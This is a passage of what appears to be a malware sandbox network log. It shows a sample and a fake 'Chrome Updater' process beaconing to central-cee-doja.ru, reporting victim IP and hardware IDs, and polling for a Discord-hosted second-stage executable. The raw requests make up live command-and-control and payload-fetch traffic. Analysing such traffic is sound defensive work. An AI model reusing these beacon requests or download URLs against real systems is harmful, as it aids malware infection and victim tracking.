                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8a1e8ed8278-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:45 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    239192.168.2.649964162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:45 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:45 UTC1337INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:45 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8a259b13b3e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 89
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:45 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=uJZF79tRQ8qEo3cGUXVOnQHr2mrLIAdCvg6pIiwIvtE-1704353505-1-AXwdofK4artzCR8u4GThiU/FsDNz9I0Ko1g59kiCLvqJBgXNfgu0KIAAUFu6hZ/06bYb52ucHJuUaVPEHNrM+wE=; path=/; expires=Thu, 04-Jan-24 08:01:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xr8MbjWEKFobQ%2FgOo0kkitkB2Vb5%2FVePZ9WYHzg%2BTd1L7DZ8H5WXYh89oJnkrsvr9qzIzxL1P%2F1F1maSd2T6YUBvBJXgnvVBxKyVvrGms8cPiCmY%2BwvwW3NO5UgNyxonYt3QXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=8UqoI0XpsEShS0stnIuDEPBLznKhnWXoZqC44VlWTJU-1704353505680-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:45 UTC236INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    240192.168.2.649965104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:46 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:46 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UTR9EysuvN6PkaD5T9tSyhXdDSjVC156xV5iKzj8gaDjslf7T%2FosoOyPNCyBs6Loo37Gz6cnTCKhQXlEYpSdKhDjaN1z7RlRZJLo0Azh0NQRDQ1hGptjIx0JEqGB1iP%2BYAD%2FC4V%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8a5ebbe397c-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:46 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    241192.168.2.649966104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:46 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:46 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BY8f4K7ZXmkufRaMeAzZgz5vKiF17SKtg%2FgkIWUNSFFsHfAm6BaBV2dlqpXV932iWLYmiDi5AVzlHD41jgZn97lAHLb0dRvJHxMSppuTVLKrajhGYR92GEqYH8Ch6wYogdPMv%2FCO"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8a63b6c81b7-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:46 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    242192.168.2.649967104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:46 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:47 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=03KtIZVvjoT3WLU9BH8v6hBGEU0HeOwnoJ66B0AtD0wGlOiLAtLZBnO5HDkhb9MqJBBNFSu1I6Mg9AWawIctw5YO8Dnb2EcLk8Jdn4%2FkQ2VVE%2BdPZ5K%2FTkM0tx5r5%2F7jcgLXhulD"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8aa394256da-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:47 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    243192.168.2.649968162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:46 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:47 UTC1332INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:47 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8ab1b985a57-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 67
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:47 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHA
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=uqIY6L6yV0FYAxjCsrBabJniofT.xG673E8UpjKo1YA-1704353507-1-AUzLsLniEBxukIxIpEOefGh/mmiqrq5lirxBhpxfNYdIwx1UuhSk9XR86AYZv2BENfwIaUznPS5GY7IcdEINbNk=; path=/; expires=Thu, 04-Jan-24 08:01:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t0Q1yMk7Ny%2FDYEqC2GSL1y24T3yQDMEAgeCsHCTnogw1nq64ln1tMsFc5e4MJtRy%2BR4Scsn6US74KCeoyQjMeMkMOKrbbvsDFf8y8ItKZjfZ3n3h4SZfoRWWJCjKwPMNt%2FoQHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ldbKZNpztVRMQaEo5tyGMBAQojxItRRlYvaOFsjPcuw-1704353507074-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:47 UTC37INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?
                                                                                    2024-01-04 07:31:47 UTC199INData Raw: 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    244192.168.2.649969162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:47 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:47 UTC1346INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:47 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8ae7a8f81df-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 80
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:47 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=gwWbK6HZqv9y1bIEqngKAy7dY2GFUycqfAeUk_8B44M-1704353507-1-AWPMabFn80KV4LtM2Dp07lQcFnAZ4VUj/b3pL28wfO5zRPL1x1aIyzJqkAq1nGIJp0FdYwLmorv0pKpjnngQZNA=; path=/; expires=Thu, 04-Jan-24 08:01:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1kJKYygWz0cyCAGfLevHgmE9%2FUseIF%2BwfYGlW2ZpikpVzkqd9CM1Y8xC5PzUBx6bOJ4IEa9NFSp6gTin%2BOdfHXBKtrLlRunQwKsE%2FtikN0OvcWQCqRt9KIooXT%2Bj1r%2B25JJa0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=uvPdi4I4C0NQbC1duke8bIDDNmmRX_8oBQpEZefThYE-1704353507617-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:47 UTC23INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63
                                                                                    Data Ascii: <?xml version='1.0' enc
                                                                                    2024-01-04 07:31:47 UTC213INData Raw: 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: oding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    245192.168.2.649970104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:47 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:47 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=REjgLYuhFyOozfJzgEp1VgkBK8zUdx5%2BRT1i5Jkc2f1%2FB8dW92BbP2PAfmvZYxkRlAAsK%2FJy4naFj4dQ415QXVf8McW8nw%2BTsVfOMBYhMY86%2FmSZyj7UYd9Fe2lhTKE4nrVQ9onc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8ae9cd882a2-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:47 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    246192.168.2.649971104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:47 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:48 UTC586INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GmOZFcR0EIy3NeVQTJ2ruzL03YcfVKCLxPqvgMd%2FjkV8%2Fo1cgsjgnw6%2BUc5QcW%2Bu4q2oIrKEILgoHWrUiGFrf37%2FUX5IrdJIbl%2FAeKZAJE%2Fy8Ruuxx5kUohqTL7H9i3mfz7zVD%2Fm"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8b20d3682ce-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:48 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    247192.168.2.649972104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:48 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:48 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=66Ndsi6G%2FzVk6ZXCZErRKT5vfRF76cd%2B%2FhUpF11OKGLTZ1nwLvFOzDRkcsP1hmPPH2m27yQhIZQeLcNcDC95Q7DZv0y98ZdGg%2F2WXrFwBCHzG3Om1BaaquAC651iWmkJb5%2F2Dl6D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8b2fe13208d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:48 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    248192.168.2.649974104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:48 UTC86OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:49 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T7XJgn%2FaSrYvVlAMbKvoTTWt6%2B3KkedBMN8oxkwrQoXUJOnN%2B8IfsOsGzAOa2iwsPFvPhDxN9FYdlaeg5ZBziObz0EiE6OwK4Ooc0GjXw19S%2Fvl2OMyEao8GdqfQB3lPdWHOsUCN"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8b65bcc82e0-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:49 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    249192.168.2.649975162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:48 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:49 UTC1346INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:49 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8b73be62033-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 91
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:49 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=_FfF9sYxnd44aA88mKrvBaFIPP96oH24KMzm8U5U1xg-1704353509-1-AbKx63eF3tPKUqHKM/LIzRlVEYdq5OU92z+IZjG3kGFY4I9707Zy4F094qXvvkR5wpNVTA1uCNbvZQBayQPALHU=; path=/; expires=Thu, 04-Jan-24 08:01:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vXiWhuZclrRpX0o4sVaCPC%2FKimZ4067f%2BqB81Xtt3m53mbAd%2Bczm7US%2BvHLuhnb5Xm2ybhiq4a%2BM4DirzRyhzIJKaNmhHR2J0D%2FaUQPwAm0drhrky7HOG4KP2DMcYrY6l47Xug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=s8y8U2pLJ2SJ8bqe_EHQoK5w0s_mLeyQez0TwOeBiw8-1704353509036-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:49 UTC23INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63
                                                                                    Data Ascii: <?xml version='1.0' enc
